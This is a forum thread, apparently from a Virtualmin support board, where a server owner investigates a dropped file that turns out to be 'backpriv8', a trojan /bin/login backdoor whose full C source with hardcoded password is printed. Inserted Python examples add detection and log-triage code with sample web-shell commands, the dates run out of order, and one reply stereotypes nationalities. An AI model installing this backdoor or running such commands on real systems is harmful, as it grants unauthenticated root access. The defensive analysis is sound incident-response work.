odd msg in /var/log/httpd/error_log

#1 Tue, 06/24/2008 - 09:18
ronald

odd msg in /var/log/httpd/error_log

this is what it says:

[code:1]mkdir: cannot create directory `3': File exists
Quantifier follows nothing in regex; marked by <-- HERE in m/* <-- HERE

# DefacerBackRoot Discovered & Coded By rUnViRuS # World Defacers TeaM WD-Geekz: rUnViRuS -PaPipiycho - n0m3rcy gcc backpriv8.c -o backpriv8 Details It's a Simple Root Backdoor So, you can change: Details Time for enetering password Path to Demon, Trojan Password for Trojan Command Interpretator to exec Join with us to Get Prvi8 Exploit Priv8 Priv8 Priv8 Priv8 -------- ~~~~*~~~~ -------- #

*/ at r.pl line 20.[/code:1]

Anyone have any ideas? It is the test server, which no one really has access to. SSH is not on the default port, FTP is closed. Only the main server has access to it, to make the backups, and that goes by RSA key, not password.

Tue, 06/24/2008 - 09:37
andreychek

That's an interesting one!

It looks like the full script might be shown here:

http://www.kasbarg.com/topic.php?topic=201679

A few questions come to mind:

* Does the file /bin/.login exist?

* If you run a find on your system, do you see a file named "backpriv8" (find / -name backpriv8)?

* What is the "r.pl" script mentioned above in the error_log?

However, you might consider running something like chkrootkit or rkhunter on your box just to be safe, that's a rather unusual error to receive :-)
-Eric

Sun, 06/07/2009 - 07:25 (Reply to #2)
ronald

Hmm, someone created a folder /3 in the /tmp dir and placed a file in there.
That's really odd, as that server has no users other than me, and I placed 2 of my own domains on there recently.

/tmp/3/ has a file r.pl
with
[code:1]/*
# gcc backpriv8.c -o backpriv8
# Details
# It's a Simple Root Backdoor
# So, you can change:
# Details
# Time for enetering password
# Path to Demon, Trojan
# Password for Trojan
# Command Interpretator to exec
# Join with us to Get Prvi8 Exploit
# Priv8 Priv8 Priv8 Priv8
# -------- ~~~~*~~~~ --------
######################################################
*/
#include<signal.h>
#include<stdio.h>
#include<stdlib.h>   /* exit() */
#include<string.h>
#include<unistd.h>
#define REALPATH "/bin/.login"   /* where the genuine login binary is expected to have been moved */
#define TROJAN "/bin/login"      /* where this binary is meant to be installed in its place */
#define PASS "worlddefacers"     /* magic password that yields a shell with login's privileges */

char **execute;
char passwd[7];   /* PASS is 13 bytes, so scanf() below overruns this buffer; kept as found */

int main(int argc, char *argv[]) {
    void connection();

    /* if no password is typed within 5 seconds, hand over to the real login */
    signal(SIGALRM,connection);
    alarm(5);
    execute=argv;
    *execute=TROJAN;   /* make argv[0] read /bin/login so the real binary sees a normal invocation */

    scanf("%s",passwd);

    if(strcmp(passwd,PASS)==0) {
        /* magic password: interactive shell, no authentication, no log entry */
        alarm(0);
        execl("/bin/sh","/bin/sh","-i",0);
        exit(0);
    }
    else
    {
        /* anything else: exec the genuine login, which prompts as usual */
        execv(REALPATH,execute);
        exit(0);
    }
}

void connection()
{
    execv(REALPATH,execute);

    exit(0);
}[/code:1]
There is no /bin/.login; a /bin/login is there, however. backpriv8 gives no results on a search.
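The source above tells you what to look for: the trojan replaces /bin/login, keeps the genuine binary at /bin/.login, and its source usually lands in /tmp first. The following is an added example, not code from the thread or from Virtualmin, that turns the questions Eric asked (does /bin/.login exist, is backpriv8 anywhere, what is in /tmp) into repeatable checks. Function names, the root-directory argument and the marker strings pulled from the posted source are this example's own choices; the only external tool it calls is rpm -Vf, which verifies the package that owns a file against the RPM database on CentOS.

```python
import os
import shutil
import subprocess

# Strings lifted from the posted backpriv8.c: hardcoded password, author tag,
# suggested binary name, and the path the trojan expects the real login at.
MARKERS = (b"worlddefacers", b"rUnViRuS", b"backpriv8", b"/bin/.login")
BIN_DIRS = ("bin", "sbin", "usr/bin", "usr/sbin")


def hidden_files_in_bin_dirs(root="/"):
    """Regular dot-files directly inside the system bin directories under root.
    A clean system has none there; this trojan needs /bin/.login to exist."""
    found = []
    for d in BIN_DIRS:
        path = os.path.join(root, d)
        if not os.path.isdir(path):
            continue
        for name in sorted(os.listdir(path)):
            full = os.path.join(path, name)
            if name.startswith(".") and os.path.isfile(full):
                found.append(full)
    return found


def files_with_markers(root="/", subdir="tmp", max_bytes=1 << 20):
    """Files under root/subdir whose first max_bytes contain any marker string
    (catches dropped source like /tmp/3/r.pl even if it was renamed)."""
    hits = []
    for dirpath, _dirs, files in os.walk(os.path.join(root, subdir)):
        for name in files:
            full = os.path.join(dirpath, name)
            try:
                with open(full, "rb") as fh:
                    data = fh.read(max_bytes)
            except OSError:
                continue
            if any(m in data for m in MARKERS):
                hits.append(full)
    return sorted(hits)


def rpm_verify(path="/bin/login"):
    """Verify the package owning path against the RPM database.
    Returns None when rpm is not installed (so 'not checked' is distinguishable
    from 'clean'), otherwise the list of mismatch lines; [] means size, mode
    and digest all match the package."""
    if shutil.which("rpm") is None:
        return None
    proc = subprocess.run(["rpm", "-Vf", path], capture_output=True, text=True)
    return [ln for ln in proc.stdout.splitlines() if ln.strip()]


def run_checks(root="/"):
    """Run all checks against a filesystem root (use a mount point of an image
    taken offline when you suspect a live rootkit). rpm is only consulted for
    the live root, since the database belongs to that system."""
    report = {
        "hidden_in_bin": hidden_files_in_bin_dirs(root),
        "markers_in_tmp": files_with_markers(root),
        "login_rpm_mismatch": rpm_verify("/bin/login") if root == "/" else None,
    }
    report["suspicious"] = bool(report["hidden_in_bin"]
                                or report["markers_in_tmp"]
                                or report["login_rpm_mismatch"])
    return report


if __name__ == "__main__":
    import json
    import sys
    print(json.dumps(run_checks(sys.argv[1] if len(sys.argv) > 1 else "/"), indent=2))
```

Run it as root on the live box, or point it at a mounted copy of the disk; a non-empty login_rpm_mismatch is the strongest signal, because the posted binary is a different size and digest from the packaged /bin/login regardless of whether /bin/.login is still around.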

Tue, 06/24/2008 - 10:26 (Reply to #4)
ronald

The owner is Apache.
chkrootkit detected nothing, btw, so I assume nothing bad happened (yet).

Tue, 06/24/2008 - 10:29 (Reply to #5)
Joe

This looks like an attempted (but probably failed) rootkit installation. There is definitely a security vulnerability on your system, though. No doubt about that: random jackasses on the internet shouldn't be able to drop files onto your system (whether they escalate to root or not is another question entirely).

What are you running on your websites? (e.g. what applications?) Are they the latest versions?

--

Check out the forum guidelines!

Sun, 06/07/2009 - 07:25 (Reply to #6)
ronald

This is CentOS 5.1 with Webmin and Virtualmin GPL, and all is the latest version.
I have only two domains of my own, and they both have an index.html.
Also, open_basedir is locked to ${HOME}.

On 1 of the sites I have SugarCRM installed, but it is "invisible", as the index.html is called before SugarCRM's index.php.

Also, the 2 domains are brand new, and the SugarCRM is also (like 4 days or so). I only used that server for daily backups till recently.

Anyway, I tried to do a yum upgrade, but a few things did go wrong and I had to reboot. I have no remote access now, and the filesystem is corrupted (it says RUN fsck), which I did.

Hm, interesting..
I'm hanging a monitor on the box, and first I'll get my main server's backups off of there.

Tue, 06/24/2008 - 11:02 (Reply to #7)
ronald

Right,
this is (of course) my own fault.
I had a dangerous PHP file still on one of the domains to check for weaknesses. I forgot to take it off the server, and it got indexed.

Some Turkish guys found it on the net and started toying with it.

I'm just wondering why it is the Turkish are always in the first row when it comes to abusing other people's belongings.... According to the logs there were like 5 of them messing around, lol.

/me deleting script..
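Deleting the script is the first step; the second is working out from the access log who used it and what they ran, since the error_log line about mkdir failing on `3' is exactly what a "cd /tmp; mkdir 3" typed into a web shell leaves behind. The following is an added example, not code from the thread, that does that triage over Apache combined-format lines: it groups every request for the script by client IP, decodes the command parameter, and separates the crawler that indexed the page from the people who then drove it. The sample log lines are constructed (documentation IP ranges), the path /test/shell.php and the parameter name cmd stand in for whatever the real test file used, and the function names are this example's own.

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines in Apache "combined" format; not from the poster's
# server. /test/shell.php is a stand-in for the leftover PHP test file.
SAMPLE_ACCESS_LOG = """\
192.0.2.10 - - [24/Jun/2008:08:51:03 +0200] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"
66.249.65.1 - - [23/Jun/2008:22:40:00 +0200] "GET /test/shell.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (compatible; Googlebot/2.1)"
198.51.100.7 - - [24/Jun/2008:09:02:11 +0200] "GET /test/shell.php HTTP/1.1" 200 5120 "http://www.google.com/search?q=inurl:shell.php" "Mozilla/4.0"
198.51.100.7 - - [24/Jun/2008:09:02:40 +0200] "GET /test/shell.php?cmd=id HTTP/1.1" 200 211 "-" "Mozilla/4.0"
198.51.100.7 - - [24/Jun/2008:09:03:05 +0200] "GET /test/shell.php?cmd=cd%20/tmp%3Bmkdir%203%3Bcd%203 HTTP/1.1" 200 310 "-" "Mozilla/4.0"
203.0.113.44 - - [24/Jun/2008:09:10:59 +0200] "POST /test/shell.php HTTP/1.1" 200 8840 "-" "Opera/9.27"
203.0.113.44 - - [24/Jun/2008:09:11:20 +0200] "GET /test/shell.php?cmd=perl%20/tmp/3/r.pl HTTP/1.1" 200 190 "-" "Opera/9.27"
garbage line that does not parse
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["time"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def webshell_activity(log_text, shell_path, cmd_param="cmd"):
    """Group every request for shell_path by client IP: hit count, first and
    last time seen, decoded values of the command parameter, referers, and
    whether the user agent calls itself a crawler (how the file got indexed)."""
    per_ip = defaultdict(lambda: {"hits": 0, "first": None, "last": None,
                                  "commands": [], "referers": set(), "crawler": False})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        url = urlsplit(rec["target"])
        if url.path != shell_path:
            continue
        e = per_ip[rec["ip"]]
        e["hits"] += 1
        e["first"] = rec["time"] if e["first"] is None else min(e["first"], rec["time"])
        e["last"] = rec["time"] if e["last"] is None else max(e["last"], rec["time"])
        # parse_qs percent-decodes, so cd%20/tmp%3Bmkdir%203 becomes "cd /tmp;mkdir 3"
        e["commands"].extend(parse_qs(url.query).get(cmd_param, []))
        if rec["referer"] != "-":
            e["referers"].add(rec["referer"])
        if "bot" in rec["ua"].lower():
            e["crawler"] = True
    return dict(per_ip)


def attackers(activity):
    """IPs that actually passed commands to the script, oldest first; a crawler
    that merely fetched the page is not one of them."""
    ips = [ip for ip, e in activity.items() if e["commands"] and not e["crawler"]]
    return sorted(ips, key=lambda ip: activity[ip]["first"])


if __name__ == "__main__":
    act = webshell_activity(SAMPLE_ACCESS_LOG, "/test/shell.php")
    for ip in attackers(act):
        e = act[ip]
        print(f'{ip}: {e["hits"]} hits, {e["first"]:%Y-%m-%d %H:%M} .. {e["last"]:%H:%M}')
        for c in e["commands"]:
            print(f"    {c}")
```

Commands sent by POST body do not show up in the access log, so a POST to the script with a large response (like the 203.0.113.44 entry) should be treated as "ran something unknown" and bounded by the timestamps around it; anything in /tmp with a modification time in that window belongs in the list of things to remove.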

Tue, 06/24/2008 - 12:48 (Reply to #8)
Joe

It's not just the Turks. ;-)

Romania, many former Soviet states, and China all have more than their fair share of crackers. I think it's a combination of a few factors: no extradition treaty with most western nations, reasonable technology infrastructure but not a lot of jobs to go around, and a history of oppression (which tends to break cultural taboos against dishonesty, since you have to lie daily to survive in an oppressive regime; it takes a generation or so of a reasonable level of freedom to recover from that). Not that I'm defending crackers and malware producers. It's just not too surprising where they mostly originate from.

--

Check out the forum guidelines!

Tue, 06/24/2008 - 10:22
andreychek

Hey Ronald,

Who's the owner of the r.pl file?
-Eric
